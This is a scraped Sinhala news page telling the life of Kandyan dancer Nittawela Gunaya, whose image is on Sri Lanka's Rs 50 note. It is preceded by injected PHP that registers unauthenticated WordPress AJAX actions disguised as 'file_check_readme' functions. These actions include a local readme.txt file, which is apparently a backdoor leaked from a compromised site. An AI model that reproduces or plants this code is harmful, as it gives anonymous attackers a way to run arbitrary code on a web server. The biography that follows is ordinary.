if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රුපියල් 50 හැමදාම අතගෑවට මේක දන්නවද බලන්න… - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

රුපියල් 50 හැමදාම අතගෑවට මේක දන්නවද බලන්න…

මේ කතාව කොහෙන් කොහොම පටන් ගන්නද?
හරි අපි මුල ඉඳලම පටන් ගමු..
දුම්බර මිටියාවතේ නිත්තවෙල කියන ගමේ ක්‍රි.ව 1906 දී පුත් කුමරෙක් උප්පත්තිය ලබනවා..ලක්මව සරසවපු මැණිකක් කිව්වත් වැරදි නෑ..
වටපුළුව ඉස්කෝලෙන් මූලික අධ්‍යාපනයට යන මේ කුමරා ඉගෙනීමට වඩා ඉතිං නැටුමට තමා දක්ශ..අපි සාමාන්‍යයෙන් කියන නැටුමමත් නෙවෙයි..උඩරට නර්තනයට..
මේ නැටුමට දක්ශ කොලු ගැටයා තමයි නිත්තවෙල ගුණයා නැත්නම් යක්දෙස්සලාගේ ගුණයා ගුරුන්නාන්සේ නම් වෙන්නේ..එතුමාගේ පියා තමයි පනික්කි ගුරුන්නාන්සෙ කියන්නෙ..ලොකු අප්පච්චි නිත්තවෙල සුරඹා ගුරුන්නාන්සෙ..
ලොකු අප්පච්චි ඒ වෙනකොට ශ්‍රී දළදා පෙරහැරේ නැට්ටුවෙක්..පොඩි කාලෙම නැටුමට ආසවුන උඩ අපි කතා කරපු ගුණයා කොලු ගැටයාත් අවු.08 වෙනකොට ශ්‍රී දළදා පෙරහැරේ නර්තනයට යන්න තරම් වාසනාවන්ත වෙනවා.ලොකු අප්පච්චිගේද ගුරු හරුකම් ඇතුව ඉස්සරහට එන මේ කොලු ගැටයා අවුරුදු 18ක් වෙද්දී වෙස් බඳිනවා…
උඩරට නර්තනයේ පෙර නොවූ විරූ දක්ශතා දක්වන්නට මේ නර්තන ශිල්පියාට හැකියාව ලැබෙනවා..එකල දෙහිවල සත්වෝද්‍යානයේ පශු වෛද්‍ය නිළධාරීව සිටි ජෝන් හෙන්බර්ග් මහතා තරුණ නර්තන ශිල්පියාගේ හැකියාව වටහාගෙන ජර්මනියට කැඳවාගෙන යන්නේ ජර්මන් වැසියන්ටද මේ උසස් නර්තනයේ රස බෙදාදීමටයි..එලෙස මාස නවයක් පුරා ජර්මනියේ ජනයා විශ්මයට පත් කල මේ තරුණයා නැවත ලංකාවට පැමිණෙන්නේ ජර්මනියේ නැවතීමට කරන ඉල්ලීම් ද පසෙකලාය..
1947 නැවත ජර්මනිය බලා යන අතර එහිදී රන් සම්මානයෙන් ඔහු පුදනු ලබනවා. ශ්‍රී ලාංකීය නර්තන ඉතිහාසයේ ස්වර්ණමය අවස්ථාවක් ලෙස මෙය සැලකිය හැකිය..
එලෙස රන් සම්මානය ලැබ නැවත දිවයිනට පැමිණෙන මේ විශිෂ්ටයාගේ වෙස් ඇඳුම් පෙට්ටිය තුළ වූ සම්මානය නැතිවෙන්නේ ඉතාමත් අබිරහස් විදියටයි…කලාකරුවෙකුට මෙය ජීවිතය නැති වූවාක් මෙන්‍ ය. මන්ද,කාලයක් පුරාවට කල මෙහෙයට අගය කිරීමක් විදියට කලාකරුවාට අන්තිමේදි ඉතිරි වන්නේ මේ සම්මානය පමණක් වීමය..
කෙසේ වුවත් 1950දී මෙම විශිෂ්ඨයා අගය කරමින් නිදහස් සමරු මුද්දරයක් නිකුත් කරනු ලබනවා…
බොහෝ දොම්නසින් වුවත් නර්තනය ඉදිරියටත් කරන මෙතුමා 1957 රුසියාවේ පැවති ලෝක තරුණ සම්මේලනයට යන්නේ ශ්‍රී ලංකා තරුණ සංස්කෘතික කණ්ඩායමේ නායකයා වශයෙනි..
එහිදීද ලංකාවට සම්මාන පිට සම්මාන ගෙන දෙමින් ලංකා නාමය ජාත්‍යන්තරයේ යළිත් වරක් දිදුළවන ලදි..
මේ අතර ප්‍රංශයේ සෝබෝර්න් විශ්ව විද්‍යාලයෙන් පැමිණි ඇරයුම් ද ප්‍රතික්ෂේප කරන්නේ මව්බිමට තම උපරිම යුතුකම් කරන අටියෙනි.
තවද ඉන්දීය සහ වෙනත් විදේශිකයන්ගෙන් බොහෝ ප්‍රවීන නර්තන ශිල්පීන් මෙතුමාගෙන් නර්තනය හැදෑරීමට මෙරටටද පැමිණ ඇත.
1958 ඉන්දියාවේ පැවති පස්වෙනි filmfare සම්මාන උළෙලට ද ආරාධනා ලැබෙන්නේ මෙතුමාගේ ජාත්‍යන්තර විශිෂ්ට බව මොනවට පැහැදිලි කරමින්..එහිදී filmfare සඟරාවේ මුල් පිටු හතරම එතුමාගේ රුවින් සරසන්නට තරම් මෙතුමා වාසනාවන්ත වෙනවා...
එස්,ඩබ්,ආර්,ඩී,බණ්ඩාරනායක මහතා අතින් ස්වර්ණ ජයන්ති සම්මානයද මෙතුමාට හිමිවෙනවා..තවද නිත්තවෙල ග්‍රාමයේම සිටි රත්වත්ත පරම්පරාව ඉඩම් කොටසක්ද මෙතුමා නමින් පවරනවා..
මෙලෙස අවුරුදු 57ක් පුරා දළදා පෙරහැරේ නර්තනය යෙදුන මෙතුමා ගැන බැලීමට අවසානයේ කිසිවෙකු නොවීය…
සිය පුතු තරුණ වියේදීම ඔහු හැරයන අතර දියණියද අකාලයේ මිය යන ලදි.තනිවන මෙතුමා අවසානයේ ජීවිකාව වෙනුවෙන් කර තිබෙන්නේ කෝපි කැඩීමයි…
කෝපි කඩන අතරතුර වැටුන දිමි ගොටුවක් නිසා එක ඇසක් අහිමි වන මෙතුමා තවත් අසරණ වෙනවා.
ගුණයා ගුරුන්නාන්සෙ ගේ එක් අවසාන ඉල්ලීමක් විය..
ඒ තමා උගත් ශිල්පය මතු පරපුරට දායාද කිරීමට නැටුම් මඩුවකට ඉඩමකි..වල්වැදී යන රජයේ ඉඩම් දහස් ගණන් තිබෙද්දී ගුණයා ගුරුන්නාන්සෙගේ ඉල්ලීමට කන්දීමට කිසිදු නිළධාරියෙක් සිටියේ නැත..
මෙසේ දුක්ඛිත තත්වයක් යටතේ අවසානයේ වර්ෂ 1979 දෙසැම්බර් 26 එතුමාගේ දිවිය කෙළවර වන්නේ නිදාසිටින අතරතුර කුප්පිලාම්පුවක් පෙරළීමෙනි..
අවුරුදු 57ක් පුරා දළදා පෙරහැර නර්තනයෙන් වර්ණවත් කිරීම මෙන්ම
ලාංකීය නර්තනයේ විශේෂයෙන්ම උඩරට නර්තනයේ සමණල වන්නම,තුරඟා වන්නම,මයුරා වන්නම,මහ බෝ වන්නම දායාද කිරීම පමණක් නොව කොහොඹා කංකාරිය ද එතුමා ඉතා හැඩවත් කල බව සඳහන්වේ..
*ලෝකයේ ඉදිරියේ ලංකාව ඔසවා තැබූ මේ නිත්තවෙල ගුණයා ගුරුන්නාන්සෙ නම් මේ විශිෂ්ඨයාගේ නර්තන සටහනකුයි ඔබ මේ රුපියල් පනහේ පැත්තක දකින්නේ…*
ප.ලි.
අහල ඇති නේද එච් එම් ජයවර්ධනයන් සංගීතවත් කරපු රත්න ශ්‍රී විජේසිංහයන් අකුර කල ජානක වික්‍රමසිංහ හඬ එකතු කල මේ පද පේලි ටික….ඒ තුලින් එතුමාගේ ජීවිත කතාව මැනවින් පැහැදිළි කරනවා….
රඟ බිමෙන් බසින විට
ගෙයි සන්තකව ඇතී…
නළල්පට මාල හත්පට
සින්න වී ඇතී…
සකියනි රිදී කාසි සොලව්න්නට
බෙර පදය මදී…..
කිරුළ මුතු ලිහී සර සර
හඬින් වැගිරෙනා…
සුළු මැදුම් දෙතිත පැටලී
ගිගිරි වැළපෙනා…
නටනවා නොවෙයි වැහැරුණු
දෙපා වෙව්ලනා
තන තන තාන තම්දෙනා..
පහළ රුපියල් පනහා දිහා හොඳට බලන්න..ඒ මූණෙන් තමන්ගෙ රට වෙනුවෙන් උපරිමය කැපකල ඒ අභිමානය හොඳින්ම පේනවා ඇති…
උපුටා ගැනීමකි…..

Related posts

කමිටු නිර්දේශ එයි – 20ට අලුත් ගැසට්ටුවක් නැත – සංශෝධන ලෙස පාර්ලිමේන්තුවට

Shiran Viraj

මැතිසබේ රකින්න හමුදාව එපා එස්.ටී.එෆ් දාන්න – හිටපු කතානායක කරු

Shiran Viraj

නානුඔය OIC සමග ට්‍රැෆික් සෙට් එකම මාරු

Shiran Viraj